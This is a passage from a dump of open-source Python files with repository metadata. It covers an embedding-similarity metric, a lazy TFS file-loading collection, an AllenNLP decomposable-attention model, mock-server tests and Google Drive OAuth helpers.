orig_suffix = cfg.setdefault('trainer_config',{}).get('log_suffix','')
cfg['trainer_config']['log_suffix'] = os.path.join(orig_suffix,f'trial{i}/')
trainer = self.make_trainer(**cfg)
trainer.logger.add_scalars('config',flatten_dict(cfg))
epochs = cfg['num_epochs'] if isinstance(cfg['num_epochs'],Iterable) else [cfg['num_epochs']]
if resume: trainer.load_checkpoint(None if resume==True else resume)
epochs = [e for e in epochs if e>trainer.epoch]
for epoch in epochs:
trainer.train_to(epoch)
if save: cfg['saved_at']=trainer.save_checkpoint()
outcome = trainer.ckpt['outcome']
trajectories = []
for mb in trainer.dataloaders['test']:
trajectories.append(pred_and_gt_ode(trainer.dataloaders['test'].dataset,trainer.model,mb))
torch.save(np.concatenate(trajectories),f"./{cfg['network']}_{cfg['net_config']['group']}_{i}.t")
except Exception as e:
if self.strict: raise
outcome = e
del trainer
return cfg, outcome
| 37.862144
| 139
| 0.613709
|
795006762868c728050c23e208f30b26853853bb
| 600
|
py
|
Python
|
concolic/concolic/__init__.py
|
msymt/Laelaps
|
a9ab61eda5ba0e8d15fe1a5ce925087784743c36
|
[
"MIT"
] | 16
|
2020-12-14T21:31:25.000Z
|
2022-01-26T03:21:40.000Z
|
concolic/concolic/__init__.py
|
msymt/Laelaps
|
a9ab61eda5ba0e8d15fe1a5ce925087784743c36
|
[
"MIT"
] | 3
|
2021-07-27T19:36:05.000Z
|
2021-12-31T02:20:53.000Z
|
concolic/concolic/__init__.py
|
msymt/Laelaps
|
a9ab61eda5ba0e8d15fe1a5ce925087784743c36
|
[
"MIT"
] | 8
|
2020-12-30T13:55:20.000Z
|
2022-01-17T03:20:36.000Z
|
import logging
import sys
import os
import shutil
LOGDIR = 'logfiles'
if os.path.exists(LOGDIR):
shutil.rmtree(LOGDIR)
os.makedirs(LOGDIR)
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
# propagate to Angr for STDIO
# ch = logging.StreamHandler(sys.stdout)
# logger.addHandler(ch)
# we handle fh
fh = logging.FileHandler(filename="./logfiles/laelaps.txt",mode='w')
logger.addHandler(fh)
formatter = logging.Formatter('%(asctime)s | %(name)s | %(levelname)s - %(message)s')
fh.setFormatter(formatter)
# well let STDIO handled in Angr for now
# logger.propagate = False
| 19.354839
| 85
| 0.745
|
7950067b6df40b780655b33074d50ccc952d0ea7
| 6,772
|
py
|
Python
|
avatar/relgan/utils/metrics/DocEmbSim.py
|
Julian-Theis/AVATAR
|
24fcd6eaa26f413be528a160d865d5d7e49a780b
|
[
"MIT"
] | 7
|
2020-12-22T12:09:14.000Z
|
2022-03-29T12:50:35.000Z
|
avatar/relgan/utils/metrics/DocEmbSim.py
|
ProminentLab/AVATAR
|
a20c767d8739a52f538927b4ec3d528952263d5a
|
[
"MIT"
] | 10
|
2020-11-13T17:45:59.000Z
|
2022-02-10T00:50:38.000Z
|
avatar/relgan/utils/metrics/DocEmbSim.py
|
ProminentLab/AVATAR
|
a20c767d8739a52f538927b4ec3d528952263d5a
|
[
"MIT"
] | 2
|
2020-03-26T22:27:27.000Z
|
2020-07-07T22:36:41.000Z
|
import collections
import math
import random
import nltk
import numpy as np
import tensorflow as tf
from scipy.spatial.distance import cosine
from avatar.relgan.utils.metrics.Metrics import Metrics
class DocEmbSim(Metrics):
def __init__(self, oracle_file=None, generator_file=None, num_vocabulary=None, name='DocEmbSim'):
super().__init__()
self.name = name
self.oracle_sim = None
self.gen_sim = None
self.is_first = True
self.oracle_file = oracle_file
self.generator_file = generator_file
self.num_vocabulary = num_vocabulary
self.batch_size = 64
self.embedding_size = 32
self.data_index = 0
self.valid_examples = None
def get_score(self):
if self.is_first:
self.get_oracle_sim()
self.is_first = False
self.get_gen_sim()
return self.get_dis_corr()
def get_frequent_word(self):
if self.valid_examples is not None:
return self.valid_examples
import collections
words = []
with open(self.oracle_file, 'r') as file:
for line in file:
text = nltk.word_tokenize(line)
text = list(map(int, text))
words += text
counts = collections.Counter(words)
new_list = sorted(words, key=lambda x: -counts[x])
word_set = list(set(new_list))
if len(word_set) < self.num_vocabulary // 10:
self.valid_examples = word_set
return word_set
else:
self.valid_examples = word_set[0: self.num_vocabulary//10] # choose 1/10 words with the highest frequency
return word_set[0: self.num_vocabulary//10]
def read_data(self, file):
words = []
with open(file, 'r') as file:
for line in file:
text = nltk.word_tokenize(line)
words.append(text)
return words
def generate_batch(self, batch_size, num_skips, skip_window, data=None):
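# Skip-gram style batching: slide a window of size 2*skip_window+1 over the token
# sequence and emit (center word, context word) pairs; each center word is reused
# num_skips times with distinct, randomly chosen context targets.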
assert batch_size % num_skips == 0
assert num_skips <= 2 * skip_window
batch = np.ndarray(shape=(batch_size), dtype=np.int32)
labels = np.ndarray(shape=(batch_size, 1), dtype=np.int32)
span = 2 * skip_window + 1 # [ skip_window target skip_window ]
buffer = collections.deque(maxlen=span) # deque to slide the window
for _ in range(span):
buffer.append(data[self.data_index])
self.data_index = (self.data_index + 1) % len(data)
for i in range(batch_size // num_skips):
target = skip_window # target label at the center of the buffer
targets_to_avoid = [skip_window]
for j in range(num_skips):
while target in targets_to_avoid:
target = random.randint(0, span - 1)
targets_to_avoid.append(target)
batch[i * num_skips + j] = buffer[skip_window]
labels[i * num_skips + j, 0] = buffer[target]
buffer.append(data[self.data_index])
self.data_index = (self.data_index + 1) % len(data)
return batch, labels
def get_wordvec(self, file):
graph = tf.Graph()
batch_size = self.batch_size
embedding_size = self.embedding_size
vocabulary_size = self.num_vocabulary
num_sampled = 64
if num_sampled > vocabulary_size:
num_sampled = vocabulary_size
num_steps = 2
skip_window = 1 # How many words to consider left and right.
num_skips = 2 # How many times to reuse an input to generate a label.
if self.valid_examples is None:
self.get_frequent_word()
with graph.as_default():
# Input data.
train_dataset = tf.placeholder(tf.int32, shape=[batch_size])
train_labels = tf.placeholder(tf.int32, shape=[batch_size, 1])
valid_dataset = tf.constant(self.valid_examples, dtype=tf.int32)
# initial Variables.
embeddings = tf.Variable(
tf.random_uniform([vocabulary_size, embedding_size], -1.0, 1.0, seed=11))
softmax_weights = tf.Variable(
tf.truncated_normal([vocabulary_size, embedding_size],
stddev=1.0 / math.sqrt(embedding_size), seed=12))
softmax_biases = tf.Variable(tf.zeros([vocabulary_size]))
# Model.
# Look up embeddings for inputs.
embed = tf.nn.embedding_lookup(embeddings, train_dataset)
# Compute the softmax loss, using a sample of the negative labels each time.
loss = tf.reduce_mean(
tf.nn.sampled_softmax_loss(weights=softmax_weights, biases=softmax_biases, inputs=embed,
labels=train_labels, num_sampled=num_sampled, num_classes=vocabulary_size))
optimizer = tf.train.AdagradOptimizer(1.0).minimize(loss)
# Compute the similarity between minibatch examples and all embeddings.
norm = tf.sqrt(tf.reduce_sum(tf.square(embeddings), 1, keep_dims=True))
normalized_embeddings = embeddings / norm
valid_embeddings = tf.nn.embedding_lookup(
normalized_embeddings, valid_dataset)
similarity = tf.matmul(valid_embeddings, tf.transpose(normalized_embeddings))
data = self.read_data(file)
with tf.Session(graph=graph) as session:
tf.global_variables_initializer().run()
average_loss = 0
generate_num = len(data)
for step in range(num_steps):
for index in range(generate_num):
cur_batch_data, cur_batch_labels = self.generate_batch(
batch_size, num_skips, skip_window, data[index])
feed_dict = {train_dataset: cur_batch_data, train_labels: cur_batch_labels}
_, l = session.run([optimizer, loss], feed_dict=feed_dict)
average_loss += l
similarity_value = similarity.eval()
return similarity_value
def get_oracle_sim(self):
self.oracle_sim = self.get_wordvec(self.oracle_file) # evaluate word embedding on the models file
def get_gen_sim(self):
self.gen_sim = self.get_wordvec(self.generator_file) # evaluate word embedding on the generator file
def get_dis_corr(self):
if len(self.oracle_sim) != len(self.gen_sim):
raise ArithmeticError
corr = 0
for index in range(len(self.oracle_sim)):
corr += (1 - cosine(np.array(self.oracle_sim[index]), np.array(self.gen_sim[index])))
return np.log10(corr / len(self.oracle_sim))
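A minimal usage sketch (an illustration, not part of the dataset record): DocEmbSim expects two text files of space-separated integer token ids, one sentence per line, plus the vocabulary size. The file paths below are placeholders and a TensorFlow 1.x environment is assumed.

from avatar.relgan.utils.metrics.DocEmbSim import DocEmbSim

# Placeholder paths; both files hold one sentence of integer token ids per line.
metric = DocEmbSim(
    oracle_file="save/oracle_ids.txt",
    generator_file="save/generator_ids.txt",
    num_vocabulary=5000,
)
# The first call trains skip-gram embeddings on the oracle file and caches its
# similarity matrix; subsequent calls only re-embed the generator file.
score = metric.get_score()
print(score)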
avg_line_length: 41.802469 | max_line_length: 118 | alphanum_fraction: 0.612965

hexsha: 7950078596d2c065a217c94205bfc57e7ee8e2e1 | size: 10,310 | ext: py | lang: Python
max_stars_repo: tfs/collection.py @ st-walker/tfs (7a229f4fecbf04d544c5116d79a281e4365ccd1d) | ["MIT"] | stars: 5 | 2019-02-18T14:38:59.000Z → 2021-12-14T15:33:50.000Z
max_issues_repo: tfs/collection.py @ st-walker/tfs (7a229f4fecbf04d544c5116d79a281e4365ccd1d) | ["MIT"] | issues: 54 | 2019-02-19T14:44:36.000Z → 2022-02-16T15:07:53.000Z
max_forks_repo: tfs/collection.py @ st-walker/tfs (7a229f4fecbf04d544c5116d79a281e4365ccd1d) | ["MIT"] | forks: 4 | 2019-10-17T08:58:57.000Z → 2022-02-15T15:55:18.000Z
content:
"""
Collection
----------------------
Advanced **TFS** files reading and writing functionality.
"""
import pathlib
from pandas import DataFrame
from tfs.frame import TfsDataFrame
from tfs.reader import read_tfs
from tfs.writer import write_tfs
class _MetaTfsCollection(type):
"""
Metaclass for TfsCollection. It takes the class attributes declared as
    `Tfs(...)` and replaces them with property getters and setters. Check
TfsCollection docs.
"""
def __new__(mcs, cls_name, bases, dct: dict):
new_dict = dict(dct)
new_dict["_two_plane_names"] = []
# for name in dct:
for key, value in dct.items():
try:
args = value.args
kwargs = value.kwargs
except AttributeError:
continue
new_props = _define_property(args, kwargs)
try:
prop_x, prop_y = new_props
new_dict.pop(key)
new_dict["_two_plane_names"].append(key)
new_dict[key + "_x"] = prop_x
new_dict[key + "_y"] = prop_y
except TypeError:
new_dict[key] = new_props
return super().__new__(mcs, cls_name, bases, new_dict)
class TfsCollection(metaclass=_MetaTfsCollection):
"""
Abstract class to lazily load and write **TFS** files.
Classes inheriting from this abstract class will be able to define **TFS** files
as readable or writable, and read or write them just as attribute access or
assignments. All attributes will be read and written as ``TfsDataFrame`` objects.
Example:
If **./example** is a directory that contains two **TFS** files **beta_phase_x.tfs**
and **beta_phase_y.tfs** with `BETX` and `BETY` columns respectively:
.. sourcecode:: python
            class ExampleCollection(TfsCollection):
# All TFS attributes must be marked with the Tfs(...) class, and generated attribute
# names will be appended with _x / _y depending on files found in "./example"
beta = Tfs("beta_phase_{}.tfs") # A TFS attribute
other_value = 7 # A traditional attribute.
                def get_filename(self, template: str, plane: str) -> str:
return template.format(plane)
example = ExampleCollection("./example")
# Get the BETX / BETY column from "beta_phase_x.tfs":
beta_x_column = example.beta_x.BETX # / example.beta_x.BETY
# Get the BETY column from "beta_phase_y.tfs":
beta_y_column = example.beta_y.BETY
# The planes can also be accessed as items (both examples below work):
beta_y_column = example.beta["y"].BETY
beta_y_column = example.beta["Y"].BETY
# This will write an empty DataFrame to "beta_phase_y.tfs":
example.allow_write = True
example.beta["y"] = DataFrame()
If the file to be loaded is not defined for two planes then the attribute can be declared as:
``coupling = Tfs("getcouple.tfs", two_planes=False)`` and then accessed as
``f1001w_column = example.coupling.F1001W``.
No file will be loaded until the corresponding attribute is accessed and the loaded
``TfsDataFrame`` will be buffered, thus the user should expect an ``IOError`` if the requested
    file is not in the provided directory (only the first time, but it is better to always take it
into account!).
When a ``TfsDataFrame`` is assigned to one attribute, it will be set as the buffer value. If the
``self.allow_write`` attribute is set to ``True``, an assignment on one of the attributes will
trigger the corresponding file write.
"""
def __init__(self, directory: pathlib.Path, allow_write: bool = None):
self.directory = pathlib.Path(directory) if isinstance(directory, str) else directory
self.allow_write = False if allow_write is None else allow_write
self.maybe_call = _MaybeCall(self)
self._buffer = {}
def get_filename(self, *args, **kwargs):
"""
Return the filename to be loaded or written.
This function will get as parameters any parameter given to the Tfs(...) attributes. It must
return the filename to be written according to those parameters. If ``two_planes=False`` is
not present in the Tfs(...) definition, it will also be given the keyword argument
``plane="x"`` or ``plane="y"``.
"""
raise NotImplementedError("This is an abstract method, it should be implemented in subclasses.")
def write_to(self, *args, **kwargs):
"""
Returns the filename and `TfsDataFrame` to be written on assignments.
If this function is overwritten, it will replace ``get_filename(...)`` in file writes to
find out the filename of the file to be written. It also gets the value assigned as first
parameter. It must return a tuple (filename, tfs_data_frame).
"""
raise NotImplementedError("This is an abstract method, it should be implemented in subclasses.")
def clear(self):
"""
Clear the file buffer.
Any subsequent attribute access will try to load the corresponding file again.
"""
self._buffer = {}
def read_tfs(self, filename: str) -> TfsDataFrame:
"""
Reads the **TFS** file from ``self.directory`` with the given filename.
This function can be overwritten to use something instead of ``tfs-pandas`` to load the
files.
Arguments:
filename (str): The name of the file to load.
Returns:
A ``TfsDataFrame`` built from reading the requested file.
"""
tfs_data_df = read_tfs(self.directory / filename)
if "NAME" in tfs_data_df:
tfs_data_df = tfs_data_df.set_index("NAME", drop=False)
return tfs_data_df
def __getattr__(self, attr: str) -> object:
if attr in self._two_plane_names:
return TfsCollection._TwoPlanes(self, attr)
raise AttributeError(f"{self.__class__.__name__} object has no attribute {attr}")
def _load_tfs(self, filename: str):
try:
return self._buffer[filename]
except KeyError:
tfs_data = self.read_tfs(filename)
if "NAME" in tfs_data:
tfs_data = tfs_data.set_index("NAME", drop=False)
self._buffer[filename] = tfs_data
return self._buffer[filename]
def _write_tfs(self, filename: str, data_frame: DataFrame):
if self.allow_write:
write_tfs(self.directory / filename, data_frame)
self._buffer[filename] = data_frame
class _TwoPlanes(object):
def __init__(self, parent, attr):
self.parent = parent
self.attr = attr
def __getitem__(self, plane: str):
return getattr(self.parent, self.attr + "_" + plane.lower())
def __setitem__(self, plane: str, value):
setattr(self.parent, self.attr + "_" + plane.lower(), value)
class Tfs:
"""Class to mark attributes as **TFS** attributes.
Any parameter given to this class will be passed to the ``get_filename()`` and ``write_to()``
methods, together with the plane if ``two_planes=False`` is not present.
"""
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
# Private methods to define the properties ##################################
def _define_property(args, kwargs):
if "two_planes" not in kwargs:
return _define_property_two_planes(args, kwargs)
elif kwargs["two_planes"]:
kwargs.pop("two_planes")
return _define_property_two_planes(args, kwargs)
else:
kwargs.pop("two_planes")
def getter_funct(self):
return _getter(self, *args, **kwargs)
def setter_funct(self, tfs_data):
return _setter(self, tfs_data, *args, **kwargs)
return property(fget=getter_funct, fset=setter_funct)
def _define_property_two_planes(args, kwargs) -> tuple:
x_kwargs = dict(kwargs)
y_kwargs = dict(kwargs)
x_kwargs["plane"] = "x"
y_kwargs["plane"] = "y"
def x_getter_funct(self):
return _getter(self, *args, **x_kwargs)
def x_setter_funct(self, tfs_data):
return _setter(self, tfs_data, *args, **x_kwargs)
def y_getter_funct(self):
return _getter(self, *args, **y_kwargs)
def y_setter_funct(self, tfs_data):
return _setter(self, tfs_data, *args, **y_kwargs)
property_x = property(fget=x_getter_funct, fset=x_setter_funct)
property_y = property(fget=y_getter_funct, fset=y_setter_funct)
return property_x, property_y
def _getter(self, *args, **kwargs):
filename = self.get_filename(*args, **kwargs)
return self._load_tfs(filename)
def _setter(self, value, *args, **kwargs):
try:
filename, data_frame = self.write_to(value, *args, **kwargs)
self._write_tfs(filename, data_frame)
except NotImplementedError:
filename = self.get_filename(*args, **kwargs)
self._write_tfs(filename, value)
class _MaybeCall:
"""
Handles the maybe_call feature of the TfsCollection.
This class defines the `maybe_call` attribute in the instances of `TfsCollection`. To avoid
repetitive try / except blocks, this class allows you to do:
``meas.maybe_call.beta["x"](some_funct, args, kwargs)``.
If the requested file is available, the call is equivalent to: ``some_funct(args, kwargs)``, if
not then no function is called and the program continues.
"""
def __init__(self, parent):
self.parent = parent
def __getattr__(self, attr):
return _MaybeCall.MaybeCallAttr(self.parent, attr)
class MaybeCallAttr:
def __init__(self, parent, attr):
self.parent = parent
self.attr = attr
def __getitem__(self, item):
return _MaybeCall.MaybeCallAttr(self.parent, self.attr + "_" + item)
def __call__(self, function_call, *args, **kwargs):
try:
tfs_file = getattr(self.parent, self.attr)
except IOError:
return lambda funct: None # Empty function
return function_call(tfs_file, *args, **kwargs)
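A hedged sketch of how the collection above might be subclassed and used; the directory, file names and the BETX column are made up for illustration.

from tfs.collection import Tfs, TfsCollection

class OpticsCollection(TfsCollection):
    beta = Tfs("beta_phase_{}.tfs")                 # expands to beta_x / beta_y properties
    couple = Tfs("getcouple.tfs", two_planes=False)

    def get_filename(self, template, plane=""):
        return template.format(plane)

meas = OpticsCollection("./measurement_dir")         # hypothetical directory
beta_x_frame = meas.beta["x"]                        # lazily reads beta_phase_x.tfs
# maybe_call silently skips the call if beta_phase_x.tfs is missing:
mean_betx = meas.maybe_call.beta["x"](lambda df: df.BETX.mean())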
avg_line_length: 36.048951 | max_line_length: 104 | alphanum_fraction: 0.63967

hexsha: 795007c97e62f75c45d0bc8b3e5c956c64244e48 | size: 9,616 | ext: py | lang: Python
max_stars_repo: allennlp/models/decomposable_attention.py @ nadgeri14/allennlp (2eefffaf71612263a1c20e8ce4107849cfd5efe3) | ["Apache-2.0"] | stars: null | null → null
max_issues_repo: allennlp/models/decomposable_attention.py @ nadgeri14/allennlp (2eefffaf71612263a1c20e8ce4107849cfd5efe3) | ["Apache-2.0"] | issues: null | null → null
max_forks_repo: allennlp/models/decomposable_attention.py @ nadgeri14/allennlp (2eefffaf71612263a1c20e8ce4107849cfd5efe3) | ["Apache-2.0"] | forks: null | null → null
content:
from typing import Dict, Optional, List, Any
import torch
from allennlp.common.checks import check_dimensions_match
from allennlp.data import TextFieldTensors, Vocabulary
from allennlp.models.model import Model
from allennlp.modules import FeedForward
from allennlp.modules import Seq2SeqEncoder, SimilarityFunction, TimeDistributed, TextFieldEmbedder
from allennlp.modules.matrix_attention.legacy_matrix_attention import LegacyMatrixAttention
from allennlp.nn import InitializerApplicator, RegularizerApplicator
from allennlp.nn.util import get_text_field_mask, masked_softmax, weighted_sum
from allennlp.training.metrics import CategoricalAccuracy
@Model.register("decomposable_attention")
class DecomposableAttention(Model):
"""
This ``Model`` implements the Decomposable Attention model described in [A Decomposable
Attention Model for Natural Language Inference](
https://www.semanticscholar.org/paper/A-Decomposable-Attention-Model-for-Natural-Languag-Parikh-T%C3%A4ckstr%C3%B6m/07a9478e87a8304fc3267fa16e83e9f3bbd98b27)
by Parikh et al., 2016, with some optional enhancements before the decomposable attention
actually happens. Parikh's original model allowed for computing an "intra-sentence" attention
before doing the decomposable entailment step. We generalize this to any
:class:`Seq2SeqEncoder` that can be applied to the premise and/or the hypothesis before
computing entailment.
The basic outline of this model is to get an embedded representation of each word in the
premise and hypothesis, align words between the two, compare the aligned phrases, and make a
final entailment decision based on this aggregated comparison. Each step in this process uses
a feedforward network to modify the representation.
# Parameters
vocab : ``Vocabulary``
text_field_embedder : ``TextFieldEmbedder``
Used to embed the ``premise`` and ``hypothesis`` ``TextFields`` we get as input to the
model.
attend_feedforward : ``FeedForward``
This feedforward network is applied to the encoded sentence representations before the
similarity matrix is computed between words in the premise and words in the hypothesis.
similarity_function : ``SimilarityFunction``
This is the similarity function used when computing the similarity matrix between words in
the premise and words in the hypothesis.
compare_feedforward : ``FeedForward``
This feedforward network is applied to the aligned premise and hypothesis representations,
individually.
aggregate_feedforward : ``FeedForward``
This final feedforward network is applied to the concatenated, summed result of the
``compare_feedforward`` network, and its output is used as the entailment class logits.
premise_encoder : ``Seq2SeqEncoder``, optional (default=``None``)
After embedding the premise, we can optionally apply an encoder. If this is ``None``, we
will do nothing.
hypothesis_encoder : ``Seq2SeqEncoder``, optional (default=``None``)
After embedding the hypothesis, we can optionally apply an encoder. If this is ``None``,
we will use the ``premise_encoder`` for the encoding (doing nothing if ``premise_encoder``
is also ``None``).
initializer : ``InitializerApplicator``, optional (default=``InitializerApplicator()``)
Used to initialize the model parameters.
regularizer : ``RegularizerApplicator``, optional (default=``None``)
If provided, will be used to calculate the regularization penalty during training.
"""
def __init__(
self,
vocab: Vocabulary,
text_field_embedder: TextFieldEmbedder,
attend_feedforward: FeedForward,
similarity_function: SimilarityFunction,
compare_feedforward: FeedForward,
aggregate_feedforward: FeedForward,
premise_encoder: Optional[Seq2SeqEncoder] = None,
hypothesis_encoder: Optional[Seq2SeqEncoder] = None,
initializer: InitializerApplicator = InitializerApplicator(),
regularizer: Optional[RegularizerApplicator] = None,
) -> None:
super().__init__(vocab, regularizer)
self._text_field_embedder = text_field_embedder
self._attend_feedforward = TimeDistributed(attend_feedforward)
self._matrix_attention = LegacyMatrixAttention(similarity_function)
self._compare_feedforward = TimeDistributed(compare_feedforward)
self._aggregate_feedforward = aggregate_feedforward
self._premise_encoder = premise_encoder
self._hypothesis_encoder = hypothesis_encoder or premise_encoder
self._num_labels = vocab.get_vocab_size(namespace="labels")
check_dimensions_match(
text_field_embedder.get_output_dim(),
attend_feedforward.get_input_dim(),
"text field embedding dim",
"attend feedforward input dim",
)
check_dimensions_match(
aggregate_feedforward.get_output_dim(),
self._num_labels,
"final output dimension",
"number of labels",
)
self._accuracy = CategoricalAccuracy()
self._loss = torch.nn.CrossEntropyLoss()
initializer(self)
def forward( # type: ignore
self,
premise: TextFieldTensors,
hypothesis: TextFieldTensors,
label: torch.IntTensor = None,
metadata: List[Dict[str, Any]] = None,
) -> Dict[str, torch.Tensor]:
"""
# Parameters
premise : TextFieldTensors
From a ``TextField``
hypothesis : TextFieldTensors
From a ``TextField``
label : torch.IntTensor, optional, (default = None)
From a ``LabelField``
metadata : ``List[Dict[str, Any]]``, optional, (default = None)
Metadata containing the original tokenization of the premise and
hypothesis with 'premise_tokens' and 'hypothesis_tokens' keys respectively.
# Returns
An output dictionary consisting of:
label_logits : torch.FloatTensor
A tensor of shape ``(batch_size, num_labels)`` representing unnormalised log
probabilities of the entailment label.
label_probs : torch.FloatTensor
A tensor of shape ``(batch_size, num_labels)`` representing probabilities of the
entailment label.
loss : torch.FloatTensor, optional
A scalar loss to be optimised.
"""
embedded_premise = self._text_field_embedder(premise)
embedded_hypothesis = self._text_field_embedder(hypothesis)
premise_mask = get_text_field_mask(premise).float()
hypothesis_mask = get_text_field_mask(hypothesis).float()
if self._premise_encoder:
embedded_premise = self._premise_encoder(embedded_premise, premise_mask)
if self._hypothesis_encoder:
embedded_hypothesis = self._hypothesis_encoder(embedded_hypothesis, hypothesis_mask)
projected_premise = self._attend_feedforward(embedded_premise)
projected_hypothesis = self._attend_feedforward(embedded_hypothesis)
# Shape: (batch_size, premise_length, hypothesis_length)
similarity_matrix = self._matrix_attention(projected_premise, projected_hypothesis)
# Shape: (batch_size, premise_length, hypothesis_length)
p2h_attention = masked_softmax(similarity_matrix, hypothesis_mask)
# Shape: (batch_size, premise_length, embedding_dim)
attended_hypothesis = weighted_sum(embedded_hypothesis, p2h_attention)
# Shape: (batch_size, hypothesis_length, premise_length)
h2p_attention = masked_softmax(similarity_matrix.transpose(1, 2).contiguous(), premise_mask)
# Shape: (batch_size, hypothesis_length, embedding_dim)
attended_premise = weighted_sum(embedded_premise, h2p_attention)
premise_compare_input = torch.cat([embedded_premise, attended_hypothesis], dim=-1)
hypothesis_compare_input = torch.cat([embedded_hypothesis, attended_premise], dim=-1)
compared_premise = self._compare_feedforward(premise_compare_input)
compared_premise = compared_premise * premise_mask.unsqueeze(-1)
# Shape: (batch_size, compare_dim)
compared_premise = compared_premise.sum(dim=1)
compared_hypothesis = self._compare_feedforward(hypothesis_compare_input)
compared_hypothesis = compared_hypothesis * hypothesis_mask.unsqueeze(-1)
# Shape: (batch_size, compare_dim)
compared_hypothesis = compared_hypothesis.sum(dim=1)
aggregate_input = torch.cat([compared_premise, compared_hypothesis], dim=-1)
label_logits = self._aggregate_feedforward(aggregate_input)
label_probs = torch.nn.functional.softmax(label_logits, dim=-1)
output_dict = {
"label_logits": label_logits,
"label_probs": label_probs,
"h2p_attention": h2p_attention,
"p2h_attention": p2h_attention,
}
if label is not None:
loss = self._loss(label_logits, label.long().view(-1))
self._accuracy(label_logits, label)
output_dict["loss"] = loss
if metadata is not None:
output_dict["premise_tokens"] = [x["premise_tokens"] for x in metadata]
output_dict["hypothesis_tokens"] = [x["hypothesis_tokens"] for x in metadata]
return output_dict
def get_metrics(self, reset: bool = False) -> Dict[str, float]:
return {"accuracy": self._accuracy.get_metric(reset)}
avg_line_length: 47.60396 | max_line_length: 161 | alphanum_fraction: 0.710483

hexsha: 7950083d20f9939b6bcce14e6e9f15c238e75152 | size: 1,278 | ext: py | lang: Python
max_stars_repo: ct/src/test_provision_and_traffic.py @ testillano/h1mock (76e74c71311bd3c3cf1e41c80d7b18e88e9f182c) | ["MIT"] | stars: 1 | 2021-12-16T19:11:46.000Z → 2021-12-16T19:11:46.000Z
max_issues_repo: ct/src/test_provision_and_traffic.py @ testillano/h1mock (76e74c71311bd3c3cf1e41c80d7b18e88e9f182c) | ["MIT"] | issues: null | null → null
max_forks_repo: ct/src/test_provision_and_traffic.py @ testillano/h1mock (76e74c71311bd3c3cf1e41c80d7b18e88e9f182c) | ["MIT"] | forks: null | null → null
content:
import pytest
import json
def test_001_provision_rules_and_functions(resources, h1mc_admin):
# Send POST
rulesAndFunctionsProvision = resources("foo-bar")
response = h1mc_admin.postData("app/v1/provision/myprovision", rulesAndFunctionsProvision)
# Verify response
assert response.status_code == 201
assert response.json()["result"] == "success: basename file 'myprovision' has been loaded"
def test_002_request_to_rules_and_functions(h1mc_traffic):
# Send GET
response = h1mc_traffic.get("app/v1/foo/bar")
# Verify response
assert response.status_code == 200
assert response.json()["resultData"] == "answering a get"
def test_003_provision_default(resources, h1mc_admin):
# Send POST
default = resources("default")
response = h1mc_admin.postData("app/v1/provision/other_provision", default)
# Verify response
assert response.status_code == 201
assert response.json()["result"] == "success: basename file 'other_provision' has been loaded"
def test_004_request_to_default(h1mc_traffic):
# Send GET
response = h1mc_traffic.get("app/v1/any/path")
# Verify response
assert response.status_code == 404
assert response.text == '<a href="https://github.com/testillano/h1mock#how-it-works">help here for mock provisions</a>'
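These tests depend on `resources`, `h1mc_admin` and `h1mc_traffic` fixtures defined elsewhere in the repository; the sketch below shows one plausible shape for such a conftest.py. The base URLs, ports and resource layout are pure assumptions.

import pytest
import requests

class _Client:
    """Thin wrapper around requests with a fixed base URL (hypothetical helper)."""
    def __init__(self, base_url):
        self.base_url = base_url.rstrip("/")

    def get(self, path):
        return requests.get(f"{self.base_url}/{path}")

    def postData(self, path, data):
        return requests.post(f"{self.base_url}/{path}", data=data)

@pytest.fixture
def h1mc_admin():
    return _Client("http://localhost:8074")    # assumed admin port

@pytest.fixture
def h1mc_traffic():
    return _Client("http://localhost:8000")    # assumed traffic port

@pytest.fixture
def resources():
    def _load(name):
        with open(f"resources/{name}.py") as fd:   # assumed resource layout
            return fd.read()
    return _load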
avg_line_length: 27.782609 | max_line_length: 121 | alphanum_fraction: 0.754304

hexsha: 795008dd550f3e82af873bfde617609d890a27fb | size: 11,428 | ext: py | lang: Python
max_stars_repo: hassiogooglebackup/googlebackup/gbcommon.py @ ulf111/syncjpg (2d959e4f0708132bf8bd7b242b5278d680cf6769) | ["MIT"] | stars: null | null → null
max_issues_repo: hassiogooglebackup/googlebackup/gbcommon.py @ ulf111/syncjpg (2d959e4f0708132bf8bd7b242b5278d680cf6769) | ["MIT"] | issues: null | null → null
max_forks_repo: hassiogooglebackup/googlebackup/gbcommon.py @ ulf111/syncjpg (2d959e4f0708132bf8bd7b242b5278d680cf6769) | ["MIT"] | forks: null | null → null
content:
import googleapiclient.http
from google_auth_oauthlib.flow import InstalledAppFlow
from google_auth_oauthlib.flow import Flow
from oauth2client.client import GoogleCredentials
from googleapiclient.discovery import build
from httplib2 import Http
import logging
import requests
from django.conf import settings
import os
import json
import glob
import ntpath
from pprint import pformat
import datetime
import mimetypes
OAUTH2_SCOPE = 'https://www.googleapis.com/auth/drive.file'
CLIENT_SECRET = os.path.join(settings.BASE_DIR, "client_secret.json")
TOKEN = os.path.join(settings.DATA_PATH, "token.json")
CONFIG_FILE = os.path.join(settings.DATA_PATH, "options.json")
def getOptions():
with open(CONFIG_FILE) as f:
options = json.load(f)
return options
def getFlowFromClientSecret():
flow = InstalledAppFlow.from_client_secrets_file(
CLIENT_SECRET,
scopes=[OAUTH2_SCOPE])
return flow
def getFlowFromClientSecret_Step2(saved_state):
flow = Flow.from_client_secrets_file(
CLIENT_SECRET,
scopes=[OAUTH2_SCOPE],
state=saved_state)
return flow
def requestAuthorization():
flow = getFlowFromClientSecret()
# Indicate where the API server will redirect the user after the user completes
# the authorization flow. The redirect URI is required.
flow.redirect_uri = "urn:ietf:wg:oauth:2.0:oob"
# Generate URL for request to Google's OAuth 2.0 server.
# Use kwargs to set optional request parameters.
authorization_url, state = flow.authorization_url(
# Enable offline access so that you can refresh an access token without
# re-prompting the user for permission. Recommended for web server apps.
access_type='offline',
# Enable incremental authorization. Recommended as a best practice.
include_granted_scopes='true')
return authorization_url, state
def fetchAndSaveTokens(saved_state, redirect_uri, authorization_response, authorizationCode):
flow = getFlowFromClientSecret_Step2(saved_state)
# flow.redirect_uri = redirect_uri
flow.redirect_uri = "urn:ietf:wg:oauth:2.0:oob"
flow.fetch_token(code=authorizationCode)
# Store the credentials for later use by REST service
credentials = flow.credentials
tokens = {
'token': credentials.token,
'refresh_token': credentials.refresh_token,
'token_uri': credentials.token_uri,
'client_id': credentials.client_id,
'client_secret': credentials.client_secret,
'scopes': credentials.scopes
}
with open(TOKEN, 'w') as outfile:
json.dump(tokens, outfile)
def getDriveService(user_agent):
